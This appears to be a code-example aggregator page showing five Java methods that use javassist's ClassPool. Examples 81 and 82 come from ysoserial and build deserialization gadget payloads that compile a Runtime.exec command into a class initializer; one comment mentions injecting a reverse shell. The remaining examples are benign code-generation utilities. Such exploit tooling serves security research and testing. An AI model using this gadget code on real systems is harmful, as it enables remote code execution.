
Example 81 with ClassPool

use of javassist.ClassPool in project ysoserial by frohoff.

the class Gadgets method createTemplatesImpl.

/**
 * Populates a templates object (presumably {@code TemplatesImpl}, per the comment below) so that
 * its {@code _bytecodes} field carries a generated class whose static initializer runs
 * {@code command}.
 *
 * <p>Steps visible in this method: instantiate {@code tplClass}; load {@code StubTransletPayload}
 * through javassist; append a {@code Runtime.exec} statement to its class initializer; rename the
 * class and re-parent it onto {@code abstTranslet}; store the resulting bytes, together with the
 * bytes of {@code Foo}, in {@code _bytecodes}; then set {@code _name} and {@code _tfactory}.
 *
 * <p>Defensive reading: nothing executes inside this method. The embedded class runs only once
 * some JVM defines and initializes it from {@code _bytecodes}; how that is triggered is outside
 * this listing. Rejecting the templates class with a deserialization filter
 * ({@code java.io.ObjectInputFilter}), or not deserializing untrusted streams at all, stops the
 * chain before that point. Inspecting command strings is not a substitute, because the command
 * is compiled into bytecode here.
 *
 * @param command      string spliced into the generated {@code Runtime.exec("...")} statement
 * @param tplClass     class instantiated reflectively and returned after population
 * @param abstTranslet class installed as the superclass of the generated payload class
 * @param transFactory class instantiated reflectively and stored in {@code _tfactory}
 * @return the populated {@code tplClass} instance
 * @throws Exception on any reflection or javassist failure; nothing is caught here
 */
public static <T> T createTemplatesImpl(final String command, Class<T> tplClass, Class<?> abstTranslet, Class<?> transFactory) throws Exception {
    final T templates = tplClass.newInstance();
    // use template gadget class
    // Both classes are added to the pool's search path so javassist can resolve them by name.
    ClassPool pool = ClassPool.getDefault();
    pool.insertClassPath(new ClassClassPath(StubTransletPayload.class));
    pool.insertClassPath(new ClassClassPath(abstTranslet));
    final CtClass clazz = pool.get(StubTransletPayload.class.getName());
    // run command in static initializer
    // TODO: could also do fun things like injecting a pure-java rev/bind-shell to bypass naive protections
    // The command is embedded as a Java string literal in generated source that javassist compiles.
    String cmd = "java.lang.Runtime.getRuntime().exec(\"" + command.replaceAll("\\\\", "\\\\\\\\").replaceAll("\"", "\\\"") + "\");";
    clazz.makeClassInitializer().insertAfter(cmd);
    // sort-of-random name to allow repeated use (watch out for PermGen exhaustion)
    // Each call yields a distinct class name derived from System.nanoTime().
    clazz.setName("ysoserial.Pwner" + System.nanoTime());
    CtClass superC = pool.get(abstTranslet.getName());
    clazz.setSuperclass(superC);
    final byte[] classBytes = clazz.toBytecode();
    // inject class bytes into instance
    // Fields are written reflectively by name; the second array entry is the bytes of Foo.
    Reflections.setFieldValue(templates, "_bytecodes", new byte[][] { classBytes, ClassFiles.classAsBytes(Foo.class) });
    // required to make TemplatesImpl happy
    Reflections.setFieldValue(templates, "_name", "Pwnr");
    Reflections.setFieldValue(templates, "_tfactory", transFactory.newInstance());
    return templates;
}
Also used : CtClass(javassist.CtClass) DESERIALIZE_TRANSLET(com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl.DESERIALIZE_TRANSLET) ClassPool(javassist.ClassPool) ClassClassPath(javassist.ClassClassPath)

Example 82 with ClassPool

use of javassist.ClassPool in project ysoserial by frohoff.

the class RemoteClassLoadingTest method makePayloadClass.

/**
 * Produces the bytes of a class derived from {@code Exploit}: the class is renamed to
 * {@code this.className} and a {@code Runtime.exec} statement built from the {@code command}
 * field is appended to its static initializer.
 *
 * <p>The statement runs when whichever JVM loads these bytes initializes the class, not when this
 * method is called. NOTE(review): the enclosing class is named RemoteClassLoadingTest, so the bytes
 * are presumably served to a class loader under test; confirm against the caller.
 *
 * @return the generated class file bytes, or a zero-length array if any step fails (the exception
 *         is printed and otherwise swallowed, so callers cannot tell failure from an empty class)
 */
protected byte[] makePayloadClass() {
    try {
        ClassPool pool = ClassPool.getDefault();
        // Make Exploit resolvable by name in the shared default pool.
        pool.insertClassPath(new ClassClassPath(Exploit.class));
        final CtClass clazz = pool.get(Exploit.class.getName());
        clazz.setName(this.className);
        // The command is embedded as a string literal in generated Java source; only double quotes are rewritten.
        clazz.makeClassInitializer().insertAfter("java.lang.Runtime.getRuntime().exec(\"" + command.replaceAll("\"", "\\\"") + "\");");
        return clazz.toBytecode();
    } catch (Exception e) {
        // Best effort: report the failure and hand back an empty payload.
        e.printStackTrace();
        return new byte[0];
    }
}
Also used : CtClass(javassist.CtClass) ClassPool(javassist.ClassPool) ClassClassPath(javassist.ClassClassPath) IOException(java.io.IOException)

Example 83 with ClassPool

use of javassist.ClassPool in project duangframework by tcrct.

the class AutoBuildServiceInterface method createInterface.

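/**
 * Generates a Java interface source file from the public instance methods of a class.
 *
 * <p>Every public, non-static method of {@code clazz} that is not in the excluded-name set is
 * rendered as an interface method signature. The interface is named {@code "I" + simple class
 * name} and written into {@code interFaceDirPath}.
 *
 * <p>The directory path is used as given apart from the emptiness and {@code '.'} checks below.
 * Rejecting every {@code '.'} also rejects {@code ".."} segments, but callers should still pass a
 * location they control.
 *
 * @param clazz            class for which the interface file is created
 * @param interFaceDirPath directory that receives the interface file; must not include a file name
 * @param packagePath      package path name handed to the interface template
 * @return {@code true} when generation completes; failures are reported by exception
 * @throws RpcException if {@code interFaceDirPath} is empty or contains a {@code '.'}, if the
 *                      target directory cannot be created, or if generation fails
 */
public static boolean createInterface(Class<?> clazz, String interFaceDirPath, String packagePath) throws Exception {
    if (ToolsKit.isEmpty(interFaceDirPath)) {
        throw new RpcException("interFaceFilePath is null");
    }
    if (interFaceDirPath.contains(".")) {
        throw new RpcException("interFaceFilePath only dir path");
    }
    Set<String> excludedMethodName = ObjectKit.buildExcludedMethodName();
    // Only public methods are considered.
    Method[] methods = clazz.getMethods();
    String classPath = clazz.getName() + ".";
    StringBuilder sb = new StringBuilder();
    try {
        ClassPool pool = ClassPool.getDefault();
        CtClass cc = pool.get(clazz.getName());
        for (Method method : methods) {
            // Skip the excluded method names (the common Object methods) and static methods.
            if (excludedMethodName.contains(method.getName()) || Modifier.isStatic(method.getModifiers())) {
                continue;
            }
            // Recover the parameter names of the method from the javassist class.
            List<String> variableNames = getLocalVariableAttributeName(cc, method);
            sb.append("\t").append(toGenericString(method, variableNames).replace(classPath, "")).append(";").append("\n\n");
        }
        // Name of the service interface.
        String fileName = "I" + clazz.getSimpleName();
        // Build the content of the interface file.
        String fileContext = createInterfaceContextString(clazz.getName(), fileName, packagePath, sb.toString());
        File interFaceFileDir = new File(interFaceDirPath);
        // Create the directory when it does not exist. The previous condition also required
        // isDirectory(), which is always false for a missing path, so mkdirs() never ran.
        if (!interFaceFileDir.exists()) {
            logger.warn("dir is not exists, create it...");
            if (!interFaceFileDir.mkdirs() && !interFaceFileDir.isDirectory()) {
                throw new RpcException("can not create dir: " + interFaceDirPath);
            }
        }
        File interFaceFile = createInterFaceFileOnDisk(interFaceDirPath, fileName, fileContext);
        if (interFaceFile.isFile()) {
            logger.warn("create " + interFaceDirPath + "/" + fileName + ".java is success!");
        }
        return true;
    } catch (Exception e) {
        // Preserve the cause so the failing step stays visible to the caller.
        throw new RpcException(e.getMessage(), e);
    }
}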
Also used : CtClass(javassist.CtClass) RpcException(com.duangframework.core.exceptions.RpcException) ClassPool(javassist.ClassPool) CtMethod(javassist.CtMethod) Method(java.lang.reflect.Method) File(java.io.File) RpcException(com.duangframework.core.exceptions.RpcException) NotFoundException(javassist.NotFoundException) EmptyNullException(com.duangframework.core.exceptions.EmptyNullException)

Example 84 with ClassPool

use of javassist.ClassPool in project systemml by apache.

the class GenerateClassesForMLContext method makeCtClasses.

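/**
 * Create compile-time classes required for later class generation.
 *
 * <p>Each of the six class files under {@code destination} is registered with the default
 * javassist {@link ClassPool}. Processing stops at the first failure; the exception is printed
 * and the method returns normally, so any remaining classes are not registered.
 */
public static void makeCtClasses() {
    // Same files, in the same order, as the sequence of makeClass calls this replaces.
    File[] classFiles = {
        new File(destination + File.separator + PATH_TO_MLCONTEXT_CLASS),
        new File(destination + File.separator + PATH_TO_MLRESULTS_CLASS),
        new File(destination + File.separator + PATH_TO_SCRIPT_CLASS),
        new File(destination + File.separator + PATH_TO_SCRIPTTYPE_CLASS),
        new File(destination + File.separator + PATH_TO_MATRIX_CLASS),
        new File(destination + File.separator + PATH_TO_FRAME_CLASS)
    };
    try {
        ClassPool pool = ClassPool.getDefault();
        for (File classFile : classFiles) {
            // try-with-resources releases the file handle even when makeClass throws;
            // the streams were previously opened and never closed.
            try (FileInputStream in = new FileInputStream(classFile)) {
                pool.makeClass(in);
            }
        }
    } catch (IOException | RuntimeException e) {
        // FileNotFoundException is an IOException, so it is still handled here.
        e.printStackTrace();
    }
}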
Also used : ClassPool(javassist.ClassPool) FileNotFoundException(java.io.FileNotFoundException) IOException(java.io.IOException) File(java.io.File) FileInputStream(java.io.FileInputStream)

Example 85 with ClassPool

use of javassist.ClassPool in project systemml by apache.

the class GenerateClassesForMLContext method addPackageConvenienceMethodsToMLContext.

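/**
 * Add methods to MLContext to allow tab-completion to packages contained
 * within the source directory (such as {@code ml.nn()}).
 *
 * <p>Nothing is added unless {@code dirPath} equals {@code SOURCE} (ignoring case). For each
 * sub-directory that {@code skipDir} does not exclude, a public no-argument method is generated
 * that returns a new instance of the class derived from that directory. The method name is the
 * directory name with {@code '-'} replaced by {@code '_'}, lower-cased.
 *
 * <p>Method bodies are generated source text built from directory names, so the directory tree is
 * expected to come from the project itself. A name that does not map to a resolvable class ends in
 * {@code NotFoundException} or {@code CannotCompileException}, which is printed.
 *
 * @param dirPath
 *            path to source directory (typically, the scripts directory)
 * @param ctMLContext
 *            javassist compile-time class representation of MLContext
 */
public static void addPackageConvenienceMethodsToMLContext(String dirPath, CtClass ctMLContext) {
    try {
        if (!SOURCE.equalsIgnoreCase(dirPath)) {
            return;
        }
        File dir = new File(dirPath);
        File[] subdirs = dir.listFiles(new FileFilter() {

            @Override
            public boolean accept(File f) {
                return f.isDirectory();
            }
        });
        if (subdirs == null) {
            // listFiles returns null when the path is not a directory or cannot be read;
            // iterating over it would throw a NullPointerException.
            System.err.println("Cannot list directory: " + dirPath);
            return;
        }
        // The default pool is loop-invariant, so look it up once.
        ClassPool pool = ClassPool.getDefault();
        for (File subdir : subdirs) {
            if (skipDir(subdir, false)) {
                continue;
            }
            String subDirPath = dirPath + File.separator + subdir.getName();
            String fullSubDirClassName = dirPathToFullDirClassName(subDirPath);
            CtClass subDirClass = pool.get(fullSubDirClassName);
            // Locale.ROOT keeps generated method names identical regardless of the build
            // machine's default locale.
            String subDirName = subdir.getName().replace('-', '_').toLowerCase(java.util.Locale.ROOT);
            System.out.println("Adding " + subDirName + "() to " + ctMLContext.getName());
            String methodBody = "{ " + fullSubDirClassName + " z = new " + fullSubDirClassName + "(); return z; }";
            CtMethod ctMethod = CtNewMethod.make(Modifier.PUBLIC, subDirClass, subDirName, null, null, methodBody, ctMLContext);
            ctMLContext.addMethod(ctMethod);
        }
    } catch (NotFoundException e) {
        e.printStackTrace();
    } catch (CannotCompileException e) {
        e.printStackTrace();
    }
}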
Also used : CtClass(javassist.CtClass) ClassPool(javassist.ClassPool) NotFoundException(javassist.NotFoundException) FileNotFoundException(java.io.FileNotFoundException) CannotCompileException(javassist.CannotCompileException) FileFilter(java.io.FileFilter) File(java.io.File) CtMethod(javassist.CtMethod)
